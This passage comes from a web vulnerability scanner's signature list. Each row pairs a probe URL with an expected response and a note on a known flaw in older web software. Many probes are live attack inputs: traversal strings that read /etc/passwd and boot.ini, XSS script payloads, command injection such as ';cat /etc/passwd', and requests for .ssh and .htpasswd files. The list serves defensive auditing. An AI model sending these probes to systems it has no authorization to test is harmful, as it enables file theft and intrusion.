Scripting (XSS). CA-2000-02." c,generic,/,".thtml",".thtml",GET,"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,"bb000001.pl","",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,"ca000001.pl?ACTION=SHOWCART&hop=\">&PATH=acatalog%2f","",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,"ca000007.pl?ACTION=SHOWCART&REFPAGE=\">","",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,"comments.php?subject=&comment=&pid=0&sid=0&mode=&order=&thold=op=Preview",,GET,"This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." c,generic,/,"ss000007.pl?PRODREF=","",GET,"Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,"[SecCheck]/..%252f..%252f../ext.ini",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"[SecCheck]/..%255c..%255c../ext.ini",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." c,generic,/,"[SecCheck]/..%2f../ext.ini",200,GET,"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." #nah #c,generic,/,%00/,"Directory listing of",GET,"Remote directories can be retrieved, (this may be a Roxen server), upgrade the server." c,generic,/,%22%3cscript%3ealert(%22xss%22)%3c/script%3e,"",GET,"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server." c,generic,/,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd,"root:",GET,"Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org)." c,generic,/,%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e,"",GET,"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server." c,generic,/,%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e,"",GET,"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server." c,generic,/,%3f.jsp,"Directory Listing",GET,"JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL." c,generic,/,%3f.jsp,"Index of",GET,"JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL." c,generic,/,................../etc/passwd,"root:",GET,"The web server allows the password file to be retrieved." c,generic,/,.../.../.../.../.../.../.../.../.../boot.ini,"boot loader",GET,"Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?" c,generic,/,../../../../../../../../../../etc/passwd,"root:",GET,"It is possible to read files on the server by adding ../ in front of file name." c,generic,/,..\..\..\..\..\..\temp\temp.class,200,GET,"Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version." c,generic,/,./,"include\(\"",GET,"Appending '/./' to a directory may reveal php source code." c,generic,/,.access,200,GET,"Contains authorization information" c,generic,/,.addressbook,200,GET,"PINE addressbook, may store sensitive e-mail address contact information and notes" c,generic,/,.bashrc,200,GET,"User home dir was found with a shell rc file. This may reveal file and path information." c,generic,/,.bash_history,200,GET,"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web." c,generic,/,.cobalt/sysManage/../admin/.htaccess,"AuthName",GET,"Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory." c,generic,/,.forward,200,GET,"User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to." c,generic,/,.history,200,GET,"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web." c,generic,/,.htaccess,200,GET,"Contains authorization information" c,generic,/,.htpasswd,200,GET,"Contains authorization information" c,generic,/,.lynx_cookies,200,GET,"User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites." c,generic,/,.passwd,200,GET,"Contains authorization information" c,generic,/,.pinerc,200,GET,"User home dir found with a PINE rc file. May reveal system information, directories and more." c,generic,/,.plan,200,GET,"User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol " c,generic,/,.proclog,200,GET,"User home dir with a Procmail log file. May reveal user mail traffic, directories and more." c,generic,/,.procmailrc,200,GET,"User home dir with a Procmail rc file. May reveal sub directories, mail contacts and more." c,generic,/,.profile,200,GET,"User home dir with a shell profile was found. May reveal directory information and system configuration." c,generic,/,.rhosts,200,GET,"A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web." c,generic,/,.sh_history,200,GET,"A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web." c,generic,/,.ssh,200,GET,"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web." c,generic,/,.ssh/authorized_keys,200,GET,"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web." c,generic,/,.ssh/known_hosts,200,GET,"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web." c,generic,/,/etc/passwd,"root:",GET,"The server install allows reading of any system file by adding an extra '/' to the URL." c,generic,/,/profile.php?u=JUNK(8),"Warning:",GET,"Powerboards (http://powerboards.sourceforge.net/) is vulnerable to path disclosure. See http://www.ifrance.com/kitetoua/tuto/powerboards.txt for details." c,generic,/,.aspx,"",GET,"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02." c,generic,/,?sql_debug=1,"SQL query: ",GET,"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string." c,generic,/,a%5c.aspx,"Invalid file name for monitoring:",GET,"Older Microsoft .NET installations allow full path disclosure." c,generic,/,a/,200,GET,"May be Kebi Web Mail administration menu." c,generic,/,access-log,200,GET,"Just found this log file..." c,generic,/,access.log,200,GET,"Just found this log file..." c,generic,/,access/,200,GET,"This might be interesting..." c,generic,/,account/,200,GET,"This might be interesting..." c,generic,/,accounting/,200,GET,"This might be interesting..." c,generic,/,active.log,"WEBactive Http Server",GET,"The WebActive log is accessible remotely." c,generic,/,add.php3?url=ja&adurl=javascript:,"",GET,"AdManager 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,add_user.php,"output started at /",GET,"DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,admin.htm,200,GET,"This might be interesting..." c,generic,/,admin.html,200,GET,"This might be interesting..." c,generic,/,admin.php,200,GET,"This might be interesting..." c,generic,/,admin.php3,200,GET,"This might be interesting..." c,generic,/,admin.php4?reg_login=1,200,GET,"Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected." c,generic,/,admin.php?en_log_id=0&action=config,200,GET,"EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected." c,generic,/,admin.php?en_log_id=0&action=users,200,GET,"EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected." c,generic,/,admin.shtml,200,GET,"This might be interesting..." c,generic,/,admin/,200,GET,"This might be interesting..." c,generic,/,admin/contextAdmin/contextAdmin.html,200,GET,"Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin." c,generic,/,Administration/,200,GET,"This might be interesting..." c,generic,/,administration/,200,GET,"This might be interesting..." c,generic,/,administrator/,200,GET,"This might be interesting..." c,generic,/,Admin_files/,200,GET,"This might be interesting..." c,generic,/,advwebadmin/,200,GET,"This might be interesting...probably HostingController, www.hostingcontroller.com" c,generic,/,akopia/,200,GET,"Akopia is installed." c,generic,/,analog/,200,GET,"This might be interesting..." c,generic,/,ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely. http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'" c,generic,/,app/,200,GET,"This might be interesting..." c,generic,/,apps/,200,GET,"This might be interesting..." c,generic,/,archive/,200,GET,"This might be interesting..." c,generic,/,article.php?article=4965&post=1111111111,"Unable to jump to row",GET,"PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent." c,generic,/,asp/,200,GET,"This might be interesting..." c,generic,/,atc/,200,GET,"This might be interesting..." c,generic,/,awebvisit.stat,200,GET,"Just found this log file..." c,generic,/,backup/,200,GET,"This might be interesting..." c,generic,/,bak/,200,GET,"This might be interesting..." c,generic,/,ban.bak,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected." c,generic,/,ban.dat,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected." c,generic,/,ban.log,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected." c,generic,/,banmat.pwd,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected." c,generic,/,basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu,"root:",GET,"Remote file retrieval." c,generic,/,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320." c,generic,/,bc4j.html,"Business Components",GET,"Default Oracle page, may allow limited administration." c,generic,/,beta/,200,GET,"This might be interesting..." c,generic,/,bigconf.cgi,200,GET,"BigIP Configuration CGI" c,generic,/,bin/,200,GET,"This might be interesting..." c,generic,/,blah-whatever-badfile.jsp,"Script /",GET,"The web server is configured to respond with the web server path when requesting a non-existent .jsp file." c,generic,/,blah123.php,"Failed opening ",GET,"PHP is configured to give descriptive error messages which can reveal file system paths." c,generic,/,blah_badfile.shtml,200,GET,"Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","" c,generic,/,buy/,200,GET,"This might be interesting..." c,generic,/,buynow/,200,GET,"This might be interesting..." c,generic,/,c/,200,GET,"This might be interesting..." c,generic,/,c32web.exe/ChangeAdminPassword,200,GET,"This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password." c,generic,/,ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini,"[fonts]",GET,"It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076" c,generic,/,ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd,"root:",GET,"It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076" c,generic,/,ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini,"[windows]",GET,"It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076" c,generic,/,cache-stats/,200,GET,"This might be interesting..." c,generic,/,cart/,200,GET,"This might be interesting..." c,generic,/,categorie.php3?cid=june,"Unable to jump to row",GET,"Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent." c,generic,/,catinfo,200,GET,"May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test." c,generic,/,ccard/,200,GET,"This might be interesting..." c,generic,/,cfcache.map,"Mapping",GET,"May leak directy listing, may also leave server open to a DOS. http://www.securiteam.com/windowsntfocus/ColdFusion_Information_Exposure__CFCACHE_Tag_.html" c,generic,/,cfide/Administrator/startstop.html,200,GET,"can start/stop the server" c,generic,/,class/mysql.class,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials." c,generic,/,code/,"Index of ",GET,"This might be interesting..." c,generic,/,com,"index of",GET,"Java class files may be browsable." c,generic,/,COM,"index of",GET,"Java class files may be browsable." c,generic,/,config/,"Index of ",GET,"This might be interesting..." c,generic,/,Config1.htm,200,GET,"This may be a D-Link, some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info." c,generic,/,contents.php?new_language=elvish&mode=select,200,GET,"Requesting a file with an invalid language selection from DC Portal may reveal the system path." c,generic,/,counter/,"Index of ",GET,"This might be interesting..." c,generic,/,cpanel/,200,GET,"Web-based control panel" c,generic,/,cplogfile.log,200,GET,"XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version." c,generic,/,credit/,"Index of ",GET,"This might be interesting..." c,generic,/,custdata/,200,GET,"This may be COWS (CGI Online Worldweb Shopping), and may be interesting..." c,generic,/,customers/,"Index of ",GET,"This might be interesting..." c,generic,/,dan_o.dat,200,GET,"Just found this log file..." c,generic,/,dat/,200,GET,"This might be interesting..." c,generic,/,data/,200,GET,"This might be interesting..." c,generic,/,database/,200,GET,"Databases? Really??" c,generic,/,databases/,200,GET,"Databases? Really??" c,generic,/,db/,200,GET,"This might be interesting..." c,generic,/,dbase/,200,GET,"This might be interesting..." c,generic,/,dev/,200,GET,"This might be interesting..." c,generic,/,devel/,200,GET,"This might be interesting..." c,generic,/,development/,200,GET,"This might be interesting..." c,generic,/,directory.php?dir=%3Bcat%20/etc/passwd,"root:",GET,"Marcus S. Xenakis directory.php script allows for command execution. CAN-2002-0434." c,generic,/,DMR/,200,GET,"This might be interesting..." c,generic,/,dms0,"DMSDUMP version",GET,"Default Oracle 9iAS allows access to Dynamic Monitoring Services" c,generic,/,doc-html/,200,GET,"This might be interesting..." c,generic,/,dostuff.php?action=modify_user,200,GET,"Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/" c,generic,/,down/,200,GET,"This might be interesting..." c,generic,/,download.php?op=viewdownload,"Failed opening",GET,"PHPNuke allows file system paths to be revealed." c,generic,/,download.php?op=viewdownload,"Fatal error",GET,"PHPNuke allows file system paths to be revealed." c,generic,/,download.php?sortby=&dcategory=,,GET,"This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." c,generic,/,download/,200,GET,"This might be interesting..." c,generic,/,downloads/,200,GET,"This might be interesting..." c,generic,/,easylog/easylog.html,200,GET,"Just found this file..." c,generic,/,employees/,200,GET,"This might be interesting..." c,generic,/,examples/jsp/snp/anything.snp,200,GET,"Tomcat servlet gives lots of host information." c,generic,/,exe/,200,GET,"This might be interesting..." c,generic,/,ext.ini.% 00.txt,200,GET,"BadBlue allows access restrictions to be bypassed by using a null byte." c,generic,/,file-that-is-not-real-2002.php3,"Unable to open",GET,"PHP is configured to show the web root when sending error messages. Set display_errors to 'off'." c,generic,/,file/,200,GET,"This might be interesting..." c,generic,/,files/,200,GET,"This might be interesting..." c,generic,/,forum/,200,GET,"This might be interesting..." c,generic,/,fpadmin/,200,GET,"This might be interesting..." c,generic,/,friend.php?op=SiteSent&fname=,"",GET,"This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." c,generic,/,ftp/,200,GET,"This might be interesting..." c,generic,/,getaccess,200,GET,"This may be an indication that the server is running getAccess for SSO" c,generic,/,global.inc,200,GET,"PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php" c,generic,/,globals.jsa,200,GET,"Oracle globals.jsa file" c,generic,/,guestbook/,200,GET,"This might be interesting..." c,generic,/,guests/,200,GET,"This might be interesting..." c,generic,/,GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system. CAN-2002-0341." c,generic,/,help/,200,GET,"Help directory should not be accessible" c,generic,/,hidden/,200,GET,"This might be interesting..." c,generic,/,hitmatic/,200,GET,"This might be interesting..." c,generic,/,hitmatic/analyse.cgi,200,GET,"Just found this cgi..." c,generic,/,hits.txt,200,GET,"Just found this log file..." c,generic,/,hit_tracker/,200,GET,"This might be interesting..." c,generic,/,home.php?arsc_language=elvish,"Failed opening '",GET,"ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified." c,generic,/,home/,200,GET,"This might be interesting..." c,generic,/,hostingcontroller/,200,GET,"This might be interesting...probably HostingController, www.hostingcontroller.com" c,generic,/,htdocs/,200,GET,"This might be interesting..." c,generic,/,html/,200,GET,"This might be interesting..." c,generic,/,HyperStat/stat_what.log,200,GET,"Just found this file..." c,generic,/,hyperstat/stat_what.log,200,GET,"Just found this log..." c,generic,/,ibill/,200,GET,"This might be interesting..." c,generic,/,idea/,200,GET,"This might be interesting..." c,generic,/,ideas/,200,GET,"This might be interesting..." c,generic,/,image/,"Index of ",GET,"index of image directory available" c,generic,/,images/,"Index of ",GET,"index of image directory available" c,generic,/,img-sys/,200,GET,"Default image directory should not allow directory listing." c,generic,/,import/,200,GET,"This might be interesting..." c,generic,/,inc/sendmail.inc,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials." c,generic,/,includes/,200,GET,"This might be interesting..." c,generic,/,incoming/,200,GET,"This might be interesting..." c,generic,/,index.jsp%00x,"<%=",GET,"Bea WebLogic 6.1 SP 2 discloses souce by appending %00x to a jsp request. Upgrade to a version newer than 6.2 SP 2 for Win2k." c,generic,/,index.php/123,"Premature end of script headers",GET,"Some versions of PHP reveal PHP's physical path on the server by appending /123 to the php file name." c,generic,/,index.php?action=search&searchFor=\">,"",GET,"MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,index.php?action=storenew&username=,"",GET,"SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02." c,generic,/,index.php?catid=<script>alert('Vulnerable')</script>,"",GET,"PostNuke is vulnerable to cross site scripting (XSS). CA-2000-02." c,generic,/,index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc,"resolv.conf",GET,"phpMyExplorer Allows attackers to read directories on the server." c,generic,/,index.php?file=index.php,"Fatal error:",GET,"PHPNuke 5.4 allows file system paths to be shown in error messages." c,generic,/,index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd,"root:",GET,"Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem." c,generic,/,index.php?page=../../../../../../../../../../boot.ini,"boot loader",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)" c,generic,/,index.php?page=../../../../../../../../../../etc/passwd,"root:",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)" c,generic,/,index.php?sql_debug=1,"SQL query: ",GET,"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string." c,generic,/,index.php?|=../../../../../../../../../etc/passwd,"root:",GET,"Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem." c,generic,/,info/,200,GET,"This might be interesting..." c,generic,/,install/,200,GET,"This might be interesting..." c,generic,/,interchange/,200,GET,"Interchange chat is installed. Look for a high-numbered port like 20xx to find it running." c,generic,/,intranet/,200,GET,"This might be interesting..." c,generic,/,ip.txt,200,GET,"This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file." c,generic,/,java-sys/,200,GET,"Default Java directory should not allow directory listing." c,generic,/,java/,200,GET,"This might be interesting..." c,generic,/,javadoc/,200,GET,"Documentation...?" c,generic,/,javax,"index of",GET,"Java class files may be browsable." c,generic,/,jdbc/,200,GET,"This might be interesting..." c,generic,/,jigsaw/,200,GET,"Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS), update to latest at http://freshmeat.net/users/yveslafon/. CA-2000-02." c,generic,/,Jigsaw/,200,GET,"Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS), update to latest at http://freshmeat.net/users/yveslafon/. CA-2000-02." c,generic,/,launch.asp?NFuse_Application=,"",GET,"NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02." c,generic,/,launch.jsp?NFuse_Application=,"",GET,"NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02." c,generic,/,lib/,200,GET,"This might be interesting..." c,generic,/,library/,200,GET,"This might be interesting..." c,generic,/,log.htm,200,GET,"Just found this log file..." c,generic,/,log.html,200,GET,"Just found this log file..." c,generic,/,log.txt,200,GET,"Just found this log file..." c,generic,/,log/,200,GET,"Ahh...log information...fun!" c,generic,/,logfile,200,GET,"Just found this log file..." c,generic,/,logfile.htm,200,GET,"Just found this log file..." c,generic,/,logfile.html,200,GET,"Just found this log file..." c,generic,/,logfile.txt,200,GET,"Just found this log file..." c,generic,/,logfile/,200,GET,"This might be interesting..." c,generic,/,logfiles/,200,GET,"This might be interesting..." c,generic,/,logger.html,200,GET,"Just found this log file..." c,generic,/,logger/,200,GET,"This might be interesting..." c,generic,/,logging/,200,GET,"This might be interesting..." c,generic,/,login/,200,GET,"This might be interesting..." c,generic,/,logs.txt,200,GET,"Just found this log file..." c,generic,/,lpt9.xtp,"java.io.FileNotFoundException:",GET,"Resin 2.1 reveals the server path when a a DOS device is requested." c,generic,/,manual.php,200,GET,"Does not filter input before passing to shell command. Try 'ls -l' as the man page entry." c,generic,/,manual/,200,GET,"Web server manual? tsk tsk." c,generic,/,midicart.mdb,200,GET,"MIDICART database is available for browsing. This should not be allowed via the web server." c,generic,/,mlog.phtml,200,GET,"Remote file read vulnerability CVE-1999-0346" c,generic,/,modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=,,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?name=Downloads&d_op=viewdownload,"Failed opening",GET,"PHPNuke allows file system paths to be revealed." c,generic,/,modules.php?name=Downloads&d_op=viewdownload,"Fatal error",GET,"PHPNuke allows file system paths to be revealed." c,generic,/,modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=","",GET,"This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?name=Members_List&sql_debug=1,200,GET,"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string." c,generic,/,modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=,,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?name=Stories_Archive&sa=show_month&year=&month=3&month_l=test,,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?name=Surveys&pollID=,,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?name=Your_Account&op=userinfo&uname=,,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?op=modload&name=0&file=0,"Failed opening ",GET,"PHP Nuke is configured to give descriptive error messages which can reveal file system paths." c,generic,/,modules.php?op=modload&name=DMOZGateway&file=index&topic=,,GET,"The DMOZGateway (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?op=modload&name=Guestbook&file=index&entry=,,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?op=modload&name=Members_List&file=index&letter=,,GET,"This install of PHPNuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?op=modload&name=WebChat&file=index&roomid=,,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=,,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink,"Failed opening ",GET,"PHP Nuke is configured to give descriptive error messages which can reveal file system paths." c,generic,/,modules.php?op=modload&name=Wiki&file=index&pagename=,"",GET,"Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?op=modload&name=Xforum&file=&fid=2,,GET,"The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=,,GET,"The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd,"root:",GET,"Gallery Addon for PhpNuke allows files to be read remotely. CAN-2001-0900." c,generic,/,mod_ose_docs,"Oracle Servlet Engine",GET,"Default Oracle documentation found." c,generic,/,mp3/,200,GET,"Uh oh..." c,generic,/,myhome.php?action=messages&box=,"",GET,"OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,mylog.phtml?screen=/etc/passwd,"root:",GET,"Remote file read vulnerability CVE-1999-0346" c,generic,/,ncl_items.html,200,GET,"This may allow attackers to reconfigure your Tektronix printer." c,generic,/,ncl_items.shtml?SUBJECT=1,200,GET,"This may allow attackers to reconfigure your Tektronix printer." c,generic,/,netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd,"root:",GET,"Sybex E-Trainer allows arbitrary files to be retrieved." c,generic,/,netget?sid=user&msg=300&file=../../../../../../../../../boot.ini,"boot loader",GET,"Sybex E-Trainer allows arbitrary files to be retrieved." c,generic,/,new/,200,GET,"This might be interesting..." c,generic,/,newuser?Image=../../database/rbsserv.mdb,"SystemErrorsPerHour",GET,"The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server." c,generic,/,opendir.php?/etc/passwd,"root:",GET,"This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321" c,generic,/,opendir.php?requesturl=/etc/passwd,"root:",GET,"This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321" c,generic,/,oprocmgr-status,"Module Name",GET,"Oracle 9iAS default install allows access to the Java Process Manager." c,generic,/,oracle/,200,GET,"This might be interesting..." c,generic,/,order/,200,GET,"This might be interesting..." c,generic,/,orders/,200,GET,"This might be interesting..." c,generic,/,outgoing/,200,GET,"This might be interesting..." c,generic,/,page.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval." c,generic,/,pages/,200,GET,"This might be interesting..." c,generic,/,passwd,200,GET,"This could be interesting..." c,generic,/,passwd.adjunct,200,GET,"This could be interesting..." c,generic,/,passwd.txt,200,GET,"This could be interesting..." c,generic,/,password,200,GET,"This could be interesting..." c,generic,/,passwords.txt,200,GET,"This could be interesting..." c,generic,/,passwords/,200,GET,"This might be interesting..." c,generic,/,PDG_Cart/,200,GET,"This might be interesting..." c,generic,/,perl/,"Index of ",GET,"This should probably not be browsable." c,generic,/,perl5/,200,GET,"This might be interesting..." c,generic,/,php/,200,GET,"This might be interesting..." c,generic,/,phpimageview.php?pic=javascript:alert('Vulnerable'),"alert('Vulnerable')",GET,"PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,phpinfo.php,200,GET,"Contains PHP configuration information" c,generic,/,phpinfo.php3,200,GET,"Contains PHP configuration information" c,generic,/,phptonuke.php?filnavn=,"",GET,"PHPNuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,piranha/secure/passwd.php3,200,GET,"This might be interesting..." c,generic,/,pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit,"",GET,"IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello,"",GET,"WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,porn/,200,GET,"Uh oh..." c,generic,/,pr0n/,200,GET,"Uh oh..." c,generic,/,private/,200,GET,"This might be interesting..." c,generic,/,pron/,200,GET,"Uh oh..." c,generic,/,pub/,200,GET,"This might be interesting..." c,generic,/,public/,200,GET,"This might be interesting..." c,generic,/,purchase/,200,GET,"This might be interesting..." c,generic,/,purchases/,200,GET,"This might be interesting..." c,generic,/,pw/,200,GET,"This might be interesting..." c,generic,/,quikstore.cfg,200,GET,"Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt" c,generic,/,quikstore.cgi,200,GET,"Shopping cart. It may be interesting..." c,generic,/,register/,200,GET,"This might be interesting..." c,generic,/,registered/,200,GET,"This might be interesting..." c,generic,/,replymsg.php?send=1&destin=,,GET,"This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). CA-2000-02." c,generic,/,reports/,200,GET,"This might be interesting..." c,generic,/,reseller/,200,GET,"This might be interesting..." c,generic,/,restricted/,200,GET,"This might be interesting..." c,generic,/,retail/,200,GET,"This might be interesting..." c,generic,/,reviews/newpro.cgi,200,GET,"This might be interesting..." c,generic,/,root/,"Index of ",GET,"This might be interesting..." c,generic,/,rtm.log,"HttpPost Retry",GET,"Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information." c,generic,/,sales/,200,GET,"This might be interesting..." c,generic,/,script>alert('Vulnerable').cfm,"",GET,"Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Patch or upgrade to a newer version, or change the default 404 document. http://www.macromedia.com/v1/handlers/index.cfm?ID=23047" c,generic,/,scripts,"Index of ",GET,"Remote scripts directory is browsable." c,generic,/,scripts/weblog,200,GET,"This might be 